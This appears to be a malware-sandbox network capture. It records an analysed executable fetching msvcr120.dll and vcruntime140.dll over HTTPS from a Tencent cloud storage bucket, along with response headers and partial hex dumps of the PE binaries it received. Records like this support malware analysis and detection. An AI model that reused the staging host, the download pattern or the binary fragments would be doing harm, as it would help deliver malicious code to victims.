                                                                    2024-07-25 09:25:40 UTC15912INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`N*NmgN*NmbN*NRich+N
                                                                    2024-07-25 09:25:40 UTC4INData Raw: 0e 8e 4e ce
                                                                    Data Ascii: N
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 2e ae 6e ee 1e 9e 5e de 3e be 7e fe 01 81 41 c1 21 a1 61 e1 11 91 51 d1 31 b1 71 f1 09 89 49 c9 29 a9 69 e9 19 99 59 d9 39 b9 79 f9 05 85 45 c5 25 a5 65 e5 15 95 55 d5 35 b5 75 f5 0d 8d 4d cd 2d ad 6d ed 1d 9d 5d dd 3d bd 7d fd 03 83 43 c3 23 a3 63 e3 13 93 53 d3 33 b3 73 f3 0b 8b 4b cb 2b ab 6b eb 1b 9b 5b db 3b bb 7b fb 07 87 47 c7 27 a7 67 e7 17 97 57 d7 37 b7 77 f7 0f 8f 4f cf 2f af 6f ef 1f 9f 5f df 3f bf 7f ff 84 7c 00 10 00 b2 03 10 00 b2 03 10 00 b2 03 10 a1 11 01 10 00 b2 03 10 00 b2 03 10 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 00 00 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 74 61 62 6c 65 20 72 61 6e 67 65 00 00 00 49 6e 64 65 78 20 69 73 20 69 6e 73 69 64 65 20 73 65 67 6d 65 6e 74 20 77 68 69 63 68 20 66
                                                                    Data Ascii: .n^>~A!aQ1qI)iY9yE%eU5uM-m]=}C#cS3sK+k[;{G'gW7wO/o_?|Index out of rangeIndex out of segments table rangeIndex is inside segment which f
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 40 68 00
                                                                    Data Ascii: oP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@@h
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68 01 00 00 85
                                                                    Data Ascii: ]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
                                                                    2024-07-25 09:25:40 UTC16368INData Raw: a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60 08 03 00 8b
                                                                    Data Ascii: s3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 4b f0 01 00 59 6a 0b 59 8b f0 8d 7b 08 f3 a5 8d 4d 90 e8 da f5 ff ff 8b c3 e8 1e c9 02 00 c2 04 00 55 8b ec 8b 45 0c 83 ec 2c 53 8b d9 56 57 89 43 04 8d 45 d4 50 c7 03 44 15 00 10 e8 0e f0 01 00 59 6a 0b 59 8d 7b 08 8b f0 f3 a5 5f 5e 8b c3 5b 8b e5 5d c2 08 00 6a 38 b8 03 cc 03 10 e8 0b c9 02 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 44 39 37 75 40 6a 34 ff 15 30 93 06 10 59 89 45 08 89 75 fc 85 c0 74 1e 8b 4d 0c e8 e7 f9 ff ff 50 8d 4d bc e8 3e f4 ff ff 8b 4d 08 43 56 50 e8 7d ff ff ff 8b f0 89 37 f6 c3 01 74 08 8d 4d bc e8 3c f5 ff ff 6a 02 58 e8 7f c8 02 00 c3 6a 00 e8 08 ff ff ff c3 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 70 15 00 10 5d c2 04 00 83 61 04 00 c7 01 70 15 00 10 c3 55 8b ec 8b 45 0c 8b 49 0c 0f b6 d0 66 8b 45 08 6a 00 66 85 04 51 58 0f 95
                                                                    Data Ascii: KYjY{MUE,SVWCEPDYjY{_^[]j8}3]tD97u@j40YEutMPM>MCVP}7tM<jXjUEAp]apUEIfEjfQX
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83 7e 14 10 72
                                                                    Data Ascii: L18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.~r
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 75 05 33 c0 40 5d c3 6a 02 58 5d c3 a9 ff 7f ff ff 75 0a 66 83 39 00 75 04 33 c0 5d c3 33 c0 66 85 d2 0f 95 c0 83 e8 02 5d c3 55 8b ec 8b 45 08 83 c0 02 5d c3 55 8b ec 51 56 8b 75 08 d9 06 dc 1d 50 12 00 10 df e0 d9 ee f6 c4 05 0f 8b 0c 01 00 00 d9 45 0c dd e1 df e0 f6 c4 44 0f 8b fa 00 00 00 d9 06 dc 1d 40 12 00 10 df e0 f6 c4 41 75 12 dd d9 33 c0 dd d8 40 d9 05 00 31 06 10 e9 dd 00 00 00 d9 06 dc 0d 20 12 00 10 d9 5d 08 d9 45 08 d8 d2 df e0 dd da f6 c4 05 7a 08 d9 05 48 12 00 10 eb 06 d9 05 18 12 00 10 d9 5d 08 d9 45 08 de c2 d9 c9 e8 33 84 02 00 0f b7 c8 0f bf c1 89 45 08 db 45 08 d9 5d 08 d9 06 d9 45 08 dd 05 a0 11 00 10 d8 c9 de ea dc 0d 10 12 00 10 de e9 d9 5d 08 d9 05 30 31 06 10 d9 c0 d9 e0 d9 45 08 d8 d1 df e0 dd d9 f6 c4 41 75 0f d8 d1 df e0 dd
                                                                    Data Ascii: u3@]jX]uf9u3]3f]UE]UQVuPED@Au3@1 ]EzH]E3EE]E]01EAu
                                                                    2024-07-25 09:25:40 UTC8184INData Raw: 47 3b f8 7f 0b 7c 04 3b f3 73 05 8b de 89 7d 10 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff 8b c6 e8 52
                                                                    Data Ascii: G;|;s}tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVHR


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.64971443.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:42 UTC135OUTGET /msvcr120.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:42 UTC472INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 970912
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:42 GMT
                                                                    ETag: "034ccadc1c073e4216e9466b720f9849"
                                                                    Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 3551019292791871068
                                                                    x-cos-request-id: NjZhMjFhMTZfOTllZjc4MGJfMjQ1YTNfNjBmNmNk
                                                                    x-cos-server-side-encryption: AES256
                                                                    2024-07-25 09:25:42 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL|OR"
                                                                    2024-07-25 09:25:42 UTC16384INData Raw: af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a 00 d1 b8 0a
                                                                    Data Ascii: SeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
                                                                    2024-07-25 09:25:42 UTC8168INData Raw: 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 74 61 72 67 65 74 40 43 6f
                                                                    Data Ascii: llection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PBD@Z??0bad_target@Co
                                                                    2024-07-25 09:25:42 UTC16384INData Raw: 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74 61 63 6b 47
                                                                    Data Ascii: SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_StackG
                                                                    2024-07-25 09:25:42 UTC8168INData Raw: 5f 73 65 74 5f 6f 75 74 70 75 74 5f 66 6f 72 6d 61 74 00 5f 73 65 74 5f 70 72 69 6e 74 66 5f 63 6f 75 6e 74 5f 6f 75 74 70 75 74 00 5f 73 65 74 5f 70 75 72 65 63 61 6c 6c 5f 68 61 6e 64 6c 65 72 00 5f 73 65 74 65 72 72 6f 72 6d 6f 64 65 00 5f 73 65 74 6a 6d 70 00 5f 73 65 74 6a 6d 70 33 00 5f 73 65 74 6d 61 78 73 74 64 69 6f 00 5f 73 65 74 6d 62 63 70 00 5f 73 65 74 6d 6f 64 65 00 5f 73 65 74 73 79 73 74 69 6d 65 00 5f 73 6c 65 65 70 00 5f 73 6e 70 72 69 6e 74 66 00 5f 73 6e 70 72 69 6e 74 66 5f 63 00 5f 73 6e 70 72 69 6e 74 66 5f 63 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 73 00 5f 73 6e 70 72 69 6e 74 66 5f 73 5f 6c 00 5f 73 6e 73 63 61 6e 66 00 5f 73 6e 73 63 61 6e 66 5f 6c 00 5f 73 6e 73 63 61 6e 66 5f 73 00 5f 73 6e
                                                                    Data Ascii: _set_output_format_set_printf_count_output_set_purecall_handler_seterrormode_setjmp_setjmp3_setmaxstdio_setmbcp_setmode_setsystime_sleep_snprintf_snprintf_c_snprintf_c_l_snprintf_l_snprintf_s_snprintf_s_l_snscanf_snscanf_l_snscanf_s_sn
                                                                    2024-07-25 09:25:42 UTC8184INData Raw: 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65
                                                                    Data Ascii: File too largeNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not e
                                                                    2024-07-25 09:25:42 UTC8184INData Raw: 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73 00 2d 00 41
                                                                    Data Ascii: NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes-A
                                                                    2024-07-25 09:25:42 UTC16384INData Raw: 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f 85 24 d5 00
                                                                    Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$
                                                                    2024-07-25 09:25:42 UTC8168INData Raw: 85 d4 fd ff ff 2d eb 10 c6 85 d4 fd ff ff 2b eb 07 c6 85 d4 fd ff ff 20 c7 85 cc fd ff ff 01 00 00 00 e9 3b 01 00 00 f6 c3 04 0f 85 95 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 30 e8 92 ca ff ff 83 c4 10 e9 78 01 00 00 85 c0 0f 8e 83 01 00 00 8b ce 48 89 85 c4 fd ff ff 0f b7 01 83 c1 02 50 6a 06 8d 45 f4 89 8d 84 fd ff ff 50 8d 85 a0 fd ff ff 50 e8 c5 9b 00 00 83 c4 10 85 c0 75 43 39 85 a0 fd ff ff 74 3b ff b5 a8 fd ff ff 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 8d 45 f4 ff b5 a0 fd ff ff 50 e8 72 ca ff ff 8b 85 c4 fd ff ff 83 c4 14 8b 8d 84 fd ff ff 85 c0 0f 84 30 01 00 00 eb 90 83 c9 ff 89 8d e0 fd ff ff e9 26 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 20 e8 ed c9 ff ff 83 c4 10 e9 4a a1 00 00 50 e8 f4 81 ff ff 33 c0 59 89 85 b0 fd
                                                                    Data Ascii: -+ ;PWj0xHPjEPPuC9t;PEPr0&PWj JP3Y
                                                                    2024-07-25 09:25:42 UTC8184INData Raw: c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 40 85 ff ff 0f b6 4e f2 0f b6 42 f2 2b c8 0f 84 37 fc ff ff 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff e9 24 fc ff ff 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 07 85 ff ff eb 93 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 ef 84 ff ff eb 26 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 d7 84 ff ff e9 66 fe ff ff 0f b6 f8 0f b6 42 ed 2b f8 75 c2 0f b6 7e ee 0f b6 42 ee 2b f8 0f 85 d4 e7 ff ff 0f b6 7e ef 0f b6 42 ef 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 95 84 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 0f 84 78 fa ff ff 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff e9 65 fa ff ff 0f b6 f8 0f b6 42 08 2b f8 75 55 0f b6 7e 09 0f b6 42 09 2b f8 0f 85 a8 06 00 00 0f
                                                                    Data Ascii: M@NB+73E$3M3M&3MfB+u~B+~B+t3MNB+x3EeB+uU~B+


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.64971543.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:44 UTC139OUTGET /vcruntime140.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:45 UTC472INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 91104
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:45 GMT
                                                                    ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b"
                                                                    Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 15584681233261869999
                                                                    x-cos-request-id: NjZhMjFhMTlfYmRlZjc4MGJfZDUyOV82MGRjZWY=
                                                                    x-cos-server-side-encryption: AES256
